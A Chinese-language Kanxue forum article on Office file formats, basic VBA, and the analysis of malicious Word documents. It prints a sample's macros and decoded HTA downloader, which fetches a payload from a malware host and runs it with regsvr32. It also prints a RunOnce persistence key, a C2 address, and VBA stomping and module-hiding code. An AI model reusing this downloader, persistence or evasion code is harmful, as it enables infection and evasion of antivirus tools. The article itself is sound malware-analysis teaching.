本文为看雪论坛精华文章
一
office文件格式
Office2007之后的版本为OpenXML格式:docx,docm,dotx,xlsx,xlsm,xltx,potx。
struct OLEGUID { unsigned int dw1; unsigned short w1; unsigned short w2; unsigned char aby[8];}; struct FileHeader{ unsigned char sig[8];//*特征码0xD0 0xCF 0x11 0xE0 0xA1 0xB1 0x1A 0xE1 OLEGUID oleguid;//ClassID unsigned short VerMinor;//修订号 unsigned short VerDll;//版本号 unsigned short ByteOrder;//*文档存储模式0xFE0xFF:小端。0xFF0xFE大端 unsigned short SectorShit;//*表示sector的大小。2^n unsigned short MiniSecShift;//*MiniSector的大小。2^n unsigned short Reserved1;//保留 unsigned int Reserved2;//保留 unsigned int NumDirSects;//*DirectorySectors目录扇区数量 unsigned int NumFatSects;//*FAT数量 unsigned int DirSect;//*Directory开始的SectorID unsigned int TransactSig;//0 unsigned int MiniStrMax;//最小Stream的最大值,默认4096 unsigned int MiniFatSect;//*MiniFAT表开始的SectorID unsigned int NumMiniFatSects;//*MiniFAT表数量 unsigned int DifatSect;//*DIFAT开始的SectorID unsigned int NumDifatSects;//*DIFAT的数量 unsigned int DiFat[109];//109个DIFAT};br
特殊ID值扇区:
//office DirectoryEntry数据结构struct Element { wchar_t Name[32];//Directory名字 unsigned short NameLength;//Name长度 unsigned char Type;//节点类型。0:非法;1:目录(storage);2:节点(Stream);5:根节点 unsigned char Flags;//节点颜色 unsigned int sidLeft;//左兄弟EntryID unsigned int sidRight;//右兄弟EntryID unsigned int sidChild;//孩子节点EntryID OLEGUID ClsID; unsigned int UserFlags;//一般为0 __int64 CreateTime;//创建时间 貌似不是时间戳的格式 __int64 ModifyTime;//文件修改时间 unsigned int StartSect;//DirectoryEntry开始的SectorID unsigned int SizeLow;//Directory存储的所有字节长度 unsigned int SizeHigh;//保留置0};br
新的文件格式实际上是标准的ZIP文件格式,我们可以像打开其他ZIP文件一样来打开Open XML的文档文件,里面包含着XML文件、RELS文件以及一些其他文件。
文档结构:
│ [Content_Types].xml //描述文档各个部分的ContentType,协助程序解析文档│├─docProps│ app.xml//程序级别的文档属性,如:页数、文本行数、程序版本等│ core.xml//用户填写的文档属性,如:标题、主题、作者等│├─word│ │ document.xml//word文档的正文│ │ fontTable.xml//word文档的页脚│ │ settings.xml//│ │ styles.xml│ │ vbaData.xml//vba属性,是否auoopen,是否加密│ │ vbaProject.bin//记录vba工程信息 ole│ │ webSettings.xml│ ││ ├─theme│ │ theme1.xml//记录样式,颜色编号,字体大小等等│ ││ └─_rels│ document.xml.rels//文档间的关系│ vbaProject.bin.rels//记录vba文件│└─_rels .rels//描述各个部分之间的关系br
安装oletools:
pip install -U oletoolsbr
3.1 分析ole文档结构工具
olebrowse:浏览器的方式查看;
olemeta:获取文档的属性数据,如作者,修改日期等;
二
VBA简单学习
模块:编写代码的区域。
函数:可以在程序的任何地方调用。Function和End Function关键字之间写代码。
子过程:没有返回值。在Sub和End Sub关键字之间写代码。
注释:以单引号(‘)开头或者以"REM"开头表示注释。
VBA变量&常量:
命名变量的基本规则:变量名第一个字符必须为字母;变量名不能使用的字符:空格 ! @ & $ #;变量名长度不超过255个字符;不能使用VB保留关键字作为变量名。
变量声明:Dim <<variable_name>> As <<variable_type>>常量声明Const <<constant_name>> As <<constant_type>> = <<constant_value>>br
数字类型数据:
非数字数据类型:
VBA运算符:
算术操作符:+-*/%^(加、减、乘、除、取余、指数)比较运算符:和其他语言一样。(<>为不相等比较)逻辑运算符:AND、OR、NOT、XOR连接运算符:+和&(两个变量为数字时A=5,B=10,A+B=15,A&B=510 ;两个变量为字符串时都是拼接字符串)br
if条件判断If(expression1) Then Statement1Elseif(expression2) Then Statement2Elseif Statement3End If switch语句Select Case expression Case expressionlist1 statement1 statement2 .... .... statement1n Case expressionlist2 statement1 statement2 .... .... Case expressionlistn statement1 statement2 .... .... Case Else elsestatement1 elsestatement2 .... ....End Select for循环For counter = start To end [Step stepcout] statement1 statement2 Exit ForNext for each循环For Each item In Group statement1Next While循环While condition(s) statemnets1Wend Do While循环Do statements1Loop While condition(s) 中途退出for循环Exit For中途退出Do while循环Exit Dobr
VBA字符串:
VBA数组:
Dim arr(5)br
可以对很多事件写代码进行处理,如SelectionChange为选择框发生改变时触发:
Dim text1 As StringsSet fso = CreateObject("Scripting.FileSystemObject")Set stream = fso.OpenTextFile("F:\worksp\vba\Support.log", ForWriting, True)text1 = "text1"stream.WriteLine text1stream.Closebr
Dim FilePath As StringFilePath = "F:\workplace\test.txt"Open FilePath For Output As #2Dim text1 As Stringtext1 = "test1"Write #2, "test1"text1 = "text2"Write #2, "test2"Close #2MsgBox ("Write text")b
三
恶意文档分析实践
所以最终目标:1、分析出文档具体行为。2、找到cc服务器。
提取vba:提取vba脚本 olevba.exe -c .\report.06.21.doc > vba.txt。
olevba 0.60 on Python 3.9.5 - http://decalage.info/python/oletools===============================================================================FILE: .\report.06.21.docType: OpenXML-------------------------------------------------------------------------------VBA MACRO ThisDocument.clsin file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -(empty macro)-------------------------------------------------------------------------------VBA MACRO procedureSize.basin file: word/vbaProject.bin - OLE stream: 'VBA/procedureSize'- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Function globView(countPoint)Debug.Print Shell("" + indexClassInit("explorer "))End FunctionFunction indexClassInit(countPoint, Optional procIteratorCaption = "c:\progra", Optional nextBooleanConv = "ta")indexClassInit = countPoint & procIteratorCaption & "mdata\linkSelectTmp.h" & nextBooleanConvEnd FunctionFunction collectClassH(arr As Variant)Dim out As Stringout = ""For cnt = 1 To UBound(arr)out = out & Chr(arr(cnt) Xor 100)NextcollectClassH = outEnd Function-------------------------------------------------------------------------------VBA MACRO rightCaptReference.basin file: word/vbaProject.bin - OLE stream: 'VBA/rightCaptReference'- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Sub autoopen()functionVIntegerqueryWin = globView("")End Sub-------------------------------------------------------------------------------VBA MACRO classRem.basin file: word/vbaProject.bin - OLE stream: 'VBA/classRem'- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Sub functionVInteger()Open indexClassInit("") For Output As #1Print #1, collectClassH(collectException)Close #1End SubFunction collectException()collectException = Split(ActiveDocument.Range.Text, "x")End Functionbr
分析VBA脚本:
functionVInteger:将文本的内容解密并写入c:\programdata\linkSelectTmp.hta;
indexClassInit:将字符串进行与“c:\programdata\linkSelectTmp.ht”进行拼接。
html><body><div id='vbMemoryCaption'>fX17KWUoaGN0YWN9O2Vzb2xjLmVsZ25pU3lyYXJiaWw7KTIgLCJncGoucG1UdGNlbGVTa25pbFxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMuZWxnbmlTeXJhcmJpbDspeWRvYmVzbm9wc2VyLldrbmlMdGFkKGV0aXJ3LmVsZ25pU3lyYXJiaWw7MSA9IGVweXQuZWxnbmlTeXJhcmJpbDtuZXBvLmVsZ25pU3lyYXJiaWw7KSJtYWVydHMuYmRvZGEiKHRjZWpiT1hldml0Y0Egd2VuID0gZWxnbmlTeXJhcmJpbCByYXZ7eXJ0eykwMDIgPT0gc3V0YXRzLldrbmlMdGFkKGZpOykoZG5lcy5Xa25pTHRhZDspZXNsYWYgLCJnOFlVRjBqQ1l1NDJCRT0mWTBBWHgwTllQMk9XVWhzTGlvWVAxd2EzRGxqPWRpYyZjODU3NWl1VU1mVFp4PWVnYXAmYUNrYlZtVjdCd0RZdHV2VmxjM0J0MWtiRFQ9ZWdhcCZjRTlKUmZtSmhINVRtd1p2dktlbUNVc0k3Mj1lZ2FwJkYwQm9QOWN0MlVxeWxxNHlobnBTUlVmcURHPWhjcmFlcyZSWmptNVdYU3d3c0hQWmRTODc5PThjRFJZMUJmaSY1Z3Q0V3hhVU89cmVzdSZmN3FnaGUyNnFoUkxKcD05SWhJRj8xMXljb2YvNzA0MjIvbWdkQ29PekZNSkZ5SFFyT05vZ3RkYTQ0RHRnRGM0S0h6ZVVpVExHWC9zSHh2OTRHTi9wem5pbS8wNzcyNy9hRFQ4Lzk4NDU4L2FkZGEvbW9jLmRzYmJvaHlkYWVybGEvLzpwdHRoIiAsIlRFRyIobmVwby5Xa25pTHRhZDspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9IFdrbmlMdGFkIHJhdg==aGV5OykiZ3BqLnBtVHRjZWxlU2tuaWxcXGNpbGJ1cFxcc3Jlc3VcXDpjIDIzcnZzZ2VyIihudXIuYlZlcnVkZWNvclBjbnVmOykidGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZWpiT1hldml0Y0Egd2VuID0gY2lyZW5lR3JlZHJvQmVtYW4gcmF2OykibGxlaHMudHBpcmNzdyIodGNlamJPWGV2aXRjQSB3ZW4gPSBiVmVydWRlY29yUGNudWYgcmF2aGV5msscriptcontrol.scriptcontrol</div><div id='funcSize'>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/</div><script language='javascript'>function lengthD(memoryText){return(new ActiveXObject(memoryText));}function intLTpl(memoryTable){return(documentTextboxListbox.getElementById(memoryTable).innerHTML);}function linkVal(){return(intLTpl('funcSize'));}function buttProcLibrary(s){var e={}; var i; var b=0; var c; var x; var l=0; var a; var windowVariantQuery=''; var w=String.fromCharCode; var L=s.length;var constC = borderMain('tArahc');for(i=0;i<64;i++){e[linkVal()[constC](i)]=i;}for(x=0;x<L;x++){c=e[s[constC](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(windowVariantQuery+=w(a));}}return(windowVariantQuery);};function borderMain(mainCount){return mainCount.split('').reverse().join('');}sizeIntLibrary = window;documentTextboxListbox = document;sizeIntLibrary.resizeTo(1, 1);sizeIntLibrary.moveTo(-100, -100);var rightHCur = documentTextboxListbox.getElementById('vbMemoryCaption').innerHTML.split("aGV5");var bytesLZero = borderMain(buttProcLibrary(rightHCur[0]));var arrMemory = borderMain(buttProcLibrary(rightHCur[1]));var pointerInteger = rightHCur[2];</script><script language='vbscript'>Function viewDelVar(vbMemoryCaption)Set screenTrustConst = CreateObject(pointerInteger)With screenTrustConst.language = "jscript".timeout = 360000End WithscreenTrustConst.eval(vbMemoryCaption)End Function</script><script language='vbscript'>Call viewDelVar(bytesLZero)</script><script language='vbscript'>Call viewDelVar(arrMemory)</script><script language='javascript'>sizeIntLibrary['close']();</script></body></html>br
var datLinkW = new ActiveXObject("msxml2.xmlhttp");datLinkW.open("GET", "http://alreadyhobbsd.com/adda/85489/8TDa/72770/minzp/NG49vxHs/XGLTiUezHK4cDgtD44adtgoNOrQHyFJMFzOoCdgm/22407/focy11?FIhI9=pJLRhq62ehgq7f&user=OUaxW4tg5&ifB1YRDc8=978SdZPHswwSXW5mjZR&search=GDqfURSpnhy4qlyqU2tc9PoB0F&page=27IsUCmeKvvZwmT5HhJmfRJ9Ec&page=TDbk1tB3clVvutYDwB7VmVbkCa&page=xZTfMUui5758c&cid=jlD3aw1PYoiLshUWO2PYN0xXA0Y&=EB24uYCj0FUY8g", false);datLinkW.send();if (datLinkW.status == 200) { try { var librarySingle = new ActiveXObject("adodb.stream"); librarySingle.open; librarySingle.type = 1; librarySingle.write(datLinkW.responsebody); librarySingle.savetofile("c:\\users\\public\\linkSelectTmp.jpg", 2); librarySingle.close; } catch(e) {}} var funcProcedureVb = new ActiveXObject("wscript.shell");var nameBorderGeneric = new ActiveXObject("scripting.filesystemobject");funcProcedureVb.run("regsvr32 c:\\users\\public\\linkSelectTmp.jpg");br
http://alreadyhobbsd.com/adda/85489/8TDa/72770/minzp/NG49vxHs/XGLTiUezHK4cDgtD44adtgoNOrQHyFJMFzOoCdgm/22407/focy11?FIhI9=pJLRhq62ehgq7f&user=OUaxW4tg5&ifB1YRDc8=978SdZPHswwSXW5mjZR&search=GDqfURSpnhy4qlyqU2tc9PoB0F&page=27IsUCmeKvvZwmT5HhJmfRJ9Ec&page=TDbk1tB3clVvutYDwB7VmVbkCa&page=xZTfMUui5758c&cid=jlD3aw1PYoiLshUWO2PYN0xXA0Y&=EB24uYCj0FUY8g
发送get请求获取linkSelectTmp.jpg
3、linkSelectTmp.hta执行“regsvr32 c:\users\public\linkSelectTmp.jpg”。
使用oledump提取vba脚本,有很多注释语句,变量名也被混淆了,正好是个不错的样本,需要动态调试查看。
Set oShell = CreateObject("Shell.Application")CallByName oShell, "ShellExecute", VbMethod, "wscript.exe", "C:\Users\abel\Downloads\deer.ini //e:VBScript //b", "", "", 0br
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\deer", "wscript.exeC:\Users\abel\Downloads\deer.ini //e:VBScript //b", "REG_SZ"。
写注册表:
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\AccessVBOM为1HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\VBAWarningsbr
"SELECT * FROM Win32_PingStatus WHERE Address=" + "'coagula.online'"br
可以使用debug.print调试输出url,得到一个url“http://83.166.240.31/get.php?independent=”。
可惜这个url已经关闭了,没法继续往下分析。
四1
office病毒常见的隐藏和反调试方法
创建一个非恶意的fakeMssage.vba:
Sub autoopen()MsgBox "fakeMessage"Sub Endbr
EvilClippy.exe -n abcdefg -n ThisDocument -s fakevba.vba doc.docbr
可以使用pcode2code库来提取源码:
小结:
VBA stoming方法主要是针对一些自动检测工具进行干扰,降低杀软报毒的可能性,对于手动分析没有干扰效果。
// Get the CompressedSourceCode from module streamBytes = commonStorage.GetStorage("VBA").GetStream(vbaModule.moduleName).GetData();string OG_VBACode = Utils.GetVBATextFromModuleStream(streamBytes, vbaModule.textOffset);// Remove P-code from module stream and set the module to only have the CompressedSourceCodestreamBytes = Utils.RemovePcodeInModuleStream(streamBytes, vbaModule.textOffset, OG_VBACode);commonStorage.GetStorage("VBA").GetStream(vbaModule.moduleName).SetData(streamBytes);br
// Change offset to 0 so that document can find compressed source code.commonStorage.GetStorage("VBA").GetStream("dir").SetData(Utils.Compress(Utils.ChangeOffset(dirStream)));Console.WriteLine("\n[*] Module offset changed to 0."); // Remove performance cache in _VBA_PROJECT stream. Replace the entire stream with _VBA_PROJECT header.byte[] data = Utils.HexToByte("CC-61-FF-FF-00-00-00");commonStorage.GetStorage("VBA").GetStream("_VBA_PROJECT").SetData(data);Console.WriteLine("\n[*] PerformanceCache removed from _VBA_PROJECT stream."); // Check if document contains SRPs. Must be removed for VBA Purging to work.try{ commonStorage.GetStorage("VBA").Delete("__SRP_0"); commonStorage.GetStorage("VBA").Delete("__SRP_1"); commonStorage.GetStorage("VBA").Delete("__SRP_2"); commonStorage.GetStorage("VBA").Delete("__SRP_3"); Console.WriteLine("\n[*] SRP streams deleted!");}br
// Hide modules from GUIif (optionHideInGUI){ foreach (var vbaModule in vbaModules) { if ((vbaModule.moduleName != "ThisDocument") && (vbaModule.moduleName != "ThisWorkbook")) { Console.WriteLine("Hiding module: " + vbaModule.moduleName); projectStreamString = projectStreamString.Replace("Module=" + vbaModule.moduleName, ""); } } // Write changes to project stream commonStorage.GetStream("project").SetData(Encoding.UTF8.GetBytes(projectStreamString));}br
文件的解析(一)
https://www.cnblogs.com/mayswind/archive/2013/03/17/2962205.html
END
看雪ID:tobeabel
https://bbs.pediy.com/user-home-755584.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!